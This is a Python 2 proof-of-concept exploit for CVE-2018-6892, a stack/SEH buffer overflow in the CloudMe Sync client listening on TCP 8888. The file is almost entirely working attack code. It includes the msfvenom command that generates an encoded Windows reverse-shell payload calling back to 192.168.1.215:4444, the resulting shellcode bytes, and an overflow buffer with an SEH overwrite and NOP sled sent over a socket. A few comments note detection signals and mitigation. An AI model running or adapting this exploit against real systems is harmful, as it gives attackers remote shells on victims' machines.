#!/usr/bin/env python
# poc for CVE-2018-6892 found by hyp3rlinx
# http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt
#
# more:
# https://nvd.nist.gov/vuln/detail/CVE-2018-6892
# https://blogs.securiteam.com/index.php/archives/3669
# https://code610.blogspot.com/2018/07/cve-2018-6892-quick-autopsy.html
import socket
# Defaults point at a local instance: the advisory links above describe the
# CloudMe Sync client listening on TCP 8888 without authentication, which is
# why a loopback address is enough to reproduce the crash in a lab.
target = "127.0.0.1"
port = 8888
# total: 10k
## shellcode:
# root@kali:/home/c/src/ssd# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.215 LPORT=4444 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a"
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 1 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 351 (iteration=0)
# x86/shikata_ga_nai chosen with final size 351
# Payload size: 351 bytes
# Final size of c file: 1500 bytes
# Pre-generated, encoded reverse-shell stage from msfvenom (command quoted in
# the comment block above).  LHOST/LPORT are baked into these bytes, so a
# successful run makes the victim process open an outbound TCP connection to
# the address chosen at generation time; that unexpected egress from the
# CloudMe Sync process is the most reliable indicator of actual compromise.
# NOTE: this is a Python 2 ``str`` literal.  Under Python 3 it is a text
# string and ``socket.send`` will refuse it, so the script is Python 2 only.
shellcode = (
"\xdd\xc2\xb8\x9c\x94\xfc\x26\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x83\xea\xfc\x31\x42\x13\x03\xde\x87\x1e\xd3\x22\x4f\x5c"
"\x1c\xda\x90\x01\x94\x3f\xa1\x01\xc2\x34\x92\xb1\x80\x18\x1f"
"\x39\xc4\x88\x94\x4f\xc1\xbf\x1d\xe5\x37\x8e\x9e\x56\x0b\x91"
"\x1c\xa5\x58\x71\x1c\x66\xad\x70\x59\x9b\x5c\x20\x32\xd7\xf3"
"\xd4\x37\xad\xcf\x5f\x0b\x23\x48\xbc\xdc\x42\x79\x13\x56\x1d"
"\x59\x92\xbb\x15\xd0\x8c\xd8\x10\xaa\x27\x2a\xee\x2d\xe1\x62"
"\x0f\x81\xcc\x4a\xe2\xdb\x09\x6c\x1d\xae\x63\x8e\xa0\xa9\xb0"
"\xec\x7e\x3f\x22\x56\xf4\xe7\x8e\x66\xd9\x7e\x45\x64\x96\xf5"
"\x01\x69\x29\xd9\x3a\x95\xa2\xdc\xec\x1f\xf0\xfa\x28\x7b\xa2"
"\x63\x69\x21\x05\x9b\x69\x8a\xfa\x39\xe2\x27\xee\x33\xa9\x2f"
"\xc3\x79\x51\xb0\x4b\x09\x22\x82\xd4\xa1\xac\xae\x9d\x6f\x2b"
"\xd0\xb7\xc8\xa3\x2f\x38\x29\xea\xeb\x6c\x79\x84\xda\x0c\x12"
"\x54\xe2\xd8\xb5\x04\x4c\xb3\x75\xf4\x2c\x63\x1e\x1e\xa3\x5c"
"\x3e\x21\x69\xf5\xd5\xd8\xfa\x3a\x81\xe3\x2d\xd2\xd0\xe3\xc0"
"\x7f\x5c\x05\x88\x6f\x08\x9e\x25\x09\x11\x54\xd7\xd6\x8f\x11"
"\xd7\x5d\x3c\xe6\x96\x95\x49\xf4\x4f\x56\x04\xa6\xc6\x69\xb2"
"\xce\x85\xf8\x59\x0e\xc3\xe0\xf5\x59\x84\xd7\x0f\x0f\x38\x41"
"\xa6\x2d\xc1\x17\x81\xf5\x1e\xe4\x0c\xf4\xd3\x50\x2b\xe6\x2d"
"\x58\x77\x52\xe2\x0f\x21\x0c\x44\xe6\x83\xe6\x1e\x55\x4a\x6e"
"\xe6\x95\x4d\xe8\xe7\xf3\x3b\x14\x59\xaa\x7d\x2b\x56\x3a\x8a"
"\x54\x8a\xda\x75\x8f\x0e\xfa\x97\x05\x7b\x93\x01\xcc\xc6\xfe"
"\xb1\x3b\x04\x07\x32\xc9\xf5\xfc\x2a\xb8\xf0\xb9\xec\x51\x89"
"\xd2\x98\x55\x3e\xd2\x88" )
# Buffer layout, with the sizes taken from the literals below:
#   junk     2232 bytes of filler
#   nSEH     4 bytes (see inline comment)
#   SEH      4 bytes, little-endian 0x6d5e3dce; which module it lands in is
#            not stated in this file -- see the advisory
#   evil     20-byte NOP sled + the 351-byte stage above
#   padding  7760 trailing bytes
# Total is a little over 10 KB, matching the "total: 10k" note above.
evil = "\x90" * 20 + shellcode
junk = "A"*2232
nSEH = "\xEB\x06\x90\x90" # short jmp + 2NOPs
SEH = "\xce\x3d\x5e\x6d" # 0x6d5e3dce
padding = "D"*7760
# Per the advisory title, the listener overflows a fixed buffer when handed
# this oversized, unauthenticated input.  Mitigation is an updated CloudMe
# Sync (check the NVD entry linked above for the fixed release) or not
# exposing TCP/8888 beyond the local host.
payload = junk + nSEH + SEH + evil + padding
def exploit(target, payload):
    """Open one TCP connection to *target* and send *payload* unauthenticated.

    ``port`` is read from module scope rather than passed in, and the
    ``target`` parameter shadows the module-level default of the same name.
    The socket is never closed; judging by the trailing comment this looks
    deliberate, so the crashed process can be inspected in a debugger.
    Python 2 only: ``print`` is used as a statement, and on Python 3
    ``send`` would reject the ``str`` payload anyway.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(( target, port ))
    # A single ~10 KB write to TCP/8888 from a source that is not the local
    # client is the network-side signal a defender can alert on; on the host,
    # the follow-on symptom is the CloudMe Sync process crashing or opening an
    # outbound connection to the address baked into the shellcode.
    s.send( payload )
    print 'done.'
    # goto immunity dbg now ;)
if __name__ == "__main__":
    # Single-shot run against the module-level target/port defaults.
    exploit(target, payload)
#